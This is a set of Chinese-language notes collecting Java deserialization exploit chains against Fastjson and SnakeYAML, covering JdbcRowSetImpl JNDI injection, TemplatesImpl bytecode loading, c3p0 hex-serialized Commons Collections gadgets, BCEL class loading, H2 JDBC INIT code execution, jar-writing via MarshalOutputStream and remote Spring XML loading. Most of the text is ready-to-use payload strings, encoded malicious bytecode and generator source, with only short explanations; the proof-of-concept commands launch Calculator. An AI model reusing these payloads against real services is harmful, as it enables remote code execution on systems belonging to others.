Fastjson利用链

JdbcRowSetImpl

payload

1
2
String text = "{\"1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}, " +
                    "\"2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator\", \"autoCommit\":true}}";

Payload的剖析

因为JdbcRowSetImpl存在JNDI注入,可以利用JNDIMap配合注入

JdbcRowSetImpl内存在无参构造方法

1
JSON.parseObject(text);

会触发所有setter和getter方法,留意setAutoCommit

![截屏2025-05-26 15.53.06](/Users/mac/Library/Application Support/typora-user-images/截屏2025-05-26 15.53.06.png)

当构造方法参数conn为null会调用connect方法

在实例化过程中,会调用无参构造方法,conn默认为nul

当getDataSourceName方法返回结果不为null,会尝试发起一次JNDI请求![截屏2025-05-26 15.53.34](/Users/mac/Library/Application Support/typora-user-images/截屏2025-05-26 15.53.34.png)

从setter得知,我们需要一个布尔值给autoCommit,便可以在代码执行时触发到setAutoCommit

TemplatesImpl

利用TemplatesImpl#getOutputPropertie去加载字节码rce

payload

1
2
3
4
5
String text = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
        "\"_bytecodes\":[\"yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1ieXRlX2V4cC5qYXZhDAAHAAgHABwMAB0AHgEAPS9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3IMAB8AIAEAFG9yZy9leGFtcGxlL2J5dGVfZXhwAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAADAAEAA0ADQAOAAsAAAAEAAEADAABAA0ADgACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAA8AAQANABAAAgAJAAAAGQAAAAQAAAABsQAAAAEACgAAAAYAAQAAABQACwAAAAQAAQAPAAEAEQAAAAIAEg==\"]," +
        "'_name':'N11'," +
        "'_tfactory':{ }," +
        "\"_outputProperties\":{ }}";
1
JSON.parseObject(text, Feature.SupportNonPublicField);

Java对象的字段如果是private或protected,默认情况下Fastjson可能无法直接访问这些字段进行反序列化,除非通过setter方法或者特定的Feature开启

该链子的弊端在于需要引入Feature.SupportNonPublicField依赖,在大多数情况是不存在的

该链子的弊端在于需要引入Feature.SupportNonPublicField依赖,在大多数情况是不存在的

com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

payload

具体分析可以看一下c3p0链

生成hex码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
package org.java_study.C3P0_1;


import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class getPayload {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(
                        "getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer(
                        "invoke", new Class[]{Object.class, Object[].class}, new Object[]{Runtime.class, null}),
                new InvokerTransformer(
                        "exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})
        };

        Transformer[] fakeTransformers = new Transformer[] {new
                ConstantTransformer(1)};
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, transformerChain);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test");
        Map expMap = new HashMap();
        expMap.put(tiedMapEntry, "N11");

        lazyMap.remove("test");

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(expMap);
        oos.close();

        System.out.println("FJ的hexEXP填这个:"+bytesToHexString(baos.toByteArray())+ "z");
        String ser = "HexAsciiSerializedMap:" + bytesToHexString(baos.toByteArray()) + "z";
        WrapperConnectionPoolDataSource exp = new WrapperConnectionPoolDataSource();
        exp.setUserOverridesAsString(ser);
    }

    public static byte[] toByteArray(InputStream in) throws IOException {
        byte[] classBytes;
        classBytes = new byte[in.available()];
        in.read(classBytes);
        in.close();
        return classBytes;
    }

    public static String bytesToHexString(byte[] bArray) {
        int length = bArray.length;
        StringBuffer sb = new StringBuffer(length);

        for(int i = 0; i < length; ++i) {
            String sTemp = Integer.toHexString(255 & bArray[i]);
            if (sTemp.length() < 2) {
                sb.append(0);
            }

            sb.append(sTemp.toUpperCase());
        }
        return sb.toString();
    }
}

Payload;

1
2
String text = "{ \"a\": { \"@type\": \"java.lang.Class\", \"val\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\" }, \"b\": { \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\", \"userOverridesAsString\": \"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740004746573747372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001C7371007E00137571007E00180000000271007E001270740006696E766F6B657571007E001C00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E00137571007E00180000000174003D2F53797374656D2F4170706C69636174696F6E732F43616C63756C61746F722E6170702F436F6E74656E74732F4D61634F532F43616C63756C61746F72740004657865637571007E001C0000000171007E001F7371007E00003F4000000000000C7708000000100000000078787400034E313178z\" } }";

sun.rmi.server.MarshalOutputStream

利用条件

openjdk >= 11

因为只有这些版本没去掉符号信息. fastjson 在类没有无参数构造函数时, 如果其他构造函数是有符号信息的话也是可以调用

的, 所以可以多利用一些内部类

在fastjson中利用比较鸡肋

com.sun.org.apache.bcel.internal.util.ClassLoader

payload

恶意BECL码生成:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
package org.java_study.byteloader;


import com.sun.org.apache.bcel.internal.classfile.Utility;
import org.springframework.util.FileCopyUtils;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;

public class BCEL {
    public static void main(String[] args) throws Exception {
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = fileToBinArray(new File("/Users/mac/check_code/java/chains/src/main/java/org/java_study/byteloader/Evil.class"));
        String code = Utility.encode(bytes, true);
        System.out.print("$$BCEL$$" + code);
        classLoader.loadClass("$$BCEL$$" + code).newInstance();
    }

    // 将方法移到main外部
    public static byte[] fileToBinArray(File file) {
        try {
            InputStream fis = new FileInputStream(file);
            byte[] bytes = FileCopyUtils.copyToByteArray(fis);
            return bytes;
        } catch (Exception ex) {
            throw new RuntimeException("transform file into bin Array 出错", ex);
        }
    }
}

恶意类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
package org.java_study.byteloader;

import java.lang.Runtime;
import java.lang.Process;
public class Evil {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/System/Applications/Calculator.app/Contents/MacOS/Calculator"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
// do nothing
        }
    }
}

Payload:

1
2
3
4
5
6
7
8
9
10
11
`\ String text =
                    "{\n"
                            + "    {\n"
                            + "        \"aaa\": {\n"
                            + "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n"
                            + "                \"driverClassLoader\": {\n"
                            + "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n"
                            + "                },\n"
                            + "                \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeR$dbn$T1$Q$3dn$b6q$ba$5d$d2$h$F$Km$80$5ePZP$fd$c2$5b$K$S$8aZ$J5$a1$88E$m$E$Sr$i$xr$d9$acW$bb$de$d2$7c$R$cf$7d$v$I$J$3e$80$8fB$8cC$d5$L$d8$92g$7c$e6$cc$cd$e3_$bf$bf$ff$E$f0$Y$PBLa$n$c4u$yr$dc$a8$e1$a6Wo$85X$c2m$8e$3b$i$cb$i$x$M$d5$j$93$g$f7$94$a1$d2$dc$7c$c3$Q$b4m_3$cctL$aa_$94$c3$9e$ce_$cb$5eBHmG$rg$cck$b1$93$eaSWfc$T$c5b$Ic$5b$e6J$ef$ZO$9d$da$3d2$c9$f6$a1$3c$92$RBLs4$o$dc$c5$3d$86Y$8f$89D$a6$D$R$bb$dc$a4$D$86$t$o$k$VN$P$c5$b3$yK$8c$92$ce$d8$b4$Qm$99$a82$91$ce$e6$db2$cbD$db$a6N$a7$ae$Q$5d$a9$O$e2K$d6$I$f7$b1$ca$b1$Wa$j$h$M$L$X$f1w$8f$95$ce$7c0$86$86$cd$H$c2$5b$3e$W$ae$ec$8fDo$e4tbe_$e7$c2$Xz$a5$ac$83$de$a1V$8ea$ee$CzU$a6$ce$M$a9$adp$a0$dd$f9e$b1$b9$d9$f9$8f$d3$a2$f7$d3$c7Z14$9b$ef$3b$ff6$db$ba$ec$f12$b7J$XE$ebJ$aa3$90$81$7f$96$c6$ed$d9$7c$3c$95$e7$d4d$8dF$e9$d7$E$98$7fR$3a$p$ba$ad$90d$q$t$b7$be$82$9d$90B$b3$a1$b3$fa$X$q$a7$fa9U$n$40$85d$e3$h$s$f6$83$l$a8$bc$ab$cc$Hqg$eb$e1$v$s$bb$8fNQ$7d$fb$F$c1$fe$c9$d8s$J$cb$e0$94$ca$c7j$90$G$8a$UP$Bu$f8$l4M$f6$3a1$oJ$3fC$h$9e$fb$81c$d6$a7$9f$h$d78$ff$H$cfb$P$c6$84$C$A$A\n\"\n"
                            + "        }\n"
                            + "    }:\"xxx\"\n";

![截屏2025-05-26 16.59.47](/Users/mac/Desktop/截屏2025-05-26 16.59.47.png)

org.h2.jdbcx.JdbcDataSource

payload

1
2
3
String text = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"org.h2.jdbcx.JdbcDataSource\"},{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.h2.jdbcx.JdbcDataSource\", \"url\":\"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\\\;CREATE ALIAS EXEC AS 'void exec() throws java.io.IOException { try { byte[] b = java.util.Base64.getDecoder().decode(\\\"yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1ieXRlX2V4cC5qYXZhDAAHAAgHABwMAB0AHgEAPS9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3IMAB8AIAEAFG9yZy9leGFtcGxlL2J5dGVfZXhwAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAADAAEAA0ADQAOAAsAAAAEAAEADAABAA0ADgACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAA8AAQANABAAAgAJAAAAGQAAAAQAAAABsQAAAAEACgAAAAYAAQAAABQACwAAAAQAAQAPAAEAEQAAAAIAEg==\\\")\\\\; java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class, int.class, int.class)\\\\; method.setAccessible(true)\\\\; Class c = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), b, 0, b.length)\\\\; c.newInstance()\\\\; } catch (Exception e){ }}'\\\\;CALL EXEC ()\\\\;\"}}:{}}\n" +
        "[{\"@type\":\"java.lang.Class\",\"val\":\"org.h2.jdbcx.JdbcDataSource\"},{\"@type\":\"org.h2.jdbcx.JdbcDataSource\", \"url\":\"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\\\;CREATE ALIAS EXEC AS 'void exec() throws java.io.IOException { try { byte[] b = java.util.Base64.getDecoder().decode(\\\"byteCodes\\\")\\\\; java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class, int.class, int.class)\\\\; method.setAccessible(true)\\\\; Class c = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), b, 0, b.length)\\\\; c.newInstance()\\\\; } catch (Exception e){ }}'\\\\;CALL EXEC ()\\\\;\"},{\"$ref\":\"$[1].connection\"}]";

payload解析

POC中存在5个参数:
JDBC的完整URL
JDBC的属性列表,类型是Java中的 Hashtable ,对应到YAML中就是一个map
连接用户名
连接密码
是否禁止创建数据库(forbidCreation)

其中,forbidCreation,用于禁止创建新的数据库,当forbidCreation等于true时,必须在目标服务器上找到一个已经存在的h2数据库文件进行连接才能执行后续JDBC注入操作,内存数据库 jdbc:h2:mem 也无法使用

但是JdbcConnection的构造函数支持让攻击者直接控制所有参数,所以直接将其设置为false即可

  • 为什么出现这么多转义?
    在第一个参数中,传入的是url,由于要在INIT中执行多个SQL语句,所以我使用了反斜线对分号进行转义
    \; ,但又由于整个URL位于YAML中的字符串中,所以还要再次对反斜线进行转义 \\;

SnakeYAML利用链

FastJson与SnakeYAML区别

![截屏2025-05-26 17.14.35](/Users/mac/Library/Application Support/typora-user-images/截屏2025-05-26 17.14.35.png)

可以看到区别是getter和constructor的区别

找到SnakeYAML的利用链只需要去寻找Fastjson中不需要getter的利用链

sun.rmi.server.MarshalOutputStream与javax.script.ScriptEngineManager

SnakeYAML的constructor使用无条件,可以考虑到sun.rmi.server.MarshalOutputStream这条链子可以写入jar文件

1
2
3
4
!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream
[!!java.io.FileOutputStream [!!java.io.File
["success.jar"],false],!!java.util.zip.Inflater { input: !!binary eJxLLE5JTCkGAAh5AnE=
},1048576]]

再使用javax.script.ScriptEngineManager 加载本地的Jar包,从而可以完成不出网利用

1
2
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL
["file:///success.jar"]]]]

org.springframework.context.support.ClassPathXmlApplicationContext

1
2
!!org.springframework.context.support.ClassPathXmlApplicationContext [
"http://example.com/spring.xml" ]

这个需要出网,如果不出网,可以先使用sun.rmi.server.MarshalOutputStream先写入xml文件后再去命令执行

org.h2.jdbcx.JdbcDataSource

根据fastjson的链子,同样可以写出来snakeyaml的利用链:

1
2
3
"!!org.h2.jdbc.JdbcConnection [ \"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if\n" +  
        "exists exec\\\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException {\n" +  
        "Runtime.getRuntime().exec(\\\"/System/Applications/Calculator.app/Contents/MacOS/Calculator\\\")\\\\; }$$\\\\;CALL EXEC ()\\\\;\", {}, \"a\", \"b\", false ]"

利用yaml语法优化格式

1
2
3
4
5
6
7
8
9
10
!!org.h2.jdbc.JdbcConnection
- jdbc:h2:mem:test
- MODE: MSSQLServer
  INIT: |
    drop alias if exists exec;
    CREATE ALIAS EXEC AS $$void exec() throws Exception {Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}$$;
    CALL EXEC ();
- a
- b
- false

c3p0链

payload

1
2
!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
  userOverridesAsString: "HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740004746573747372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001C7371007E00137571007E00180000000271007E001270740006696E766F6B657571007E001C00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E00137571007E00180000000174003D2F53797374656D2F4170706C69636174696F6E732F43616C63756C61746F722E6170702F436F6E74656E74732F4D61634F532F43616C63756C61746F72740004657865637571007E001C0000000171007E001F7371007E00003F4000000000000C7708000000100000000078787400034E313178;"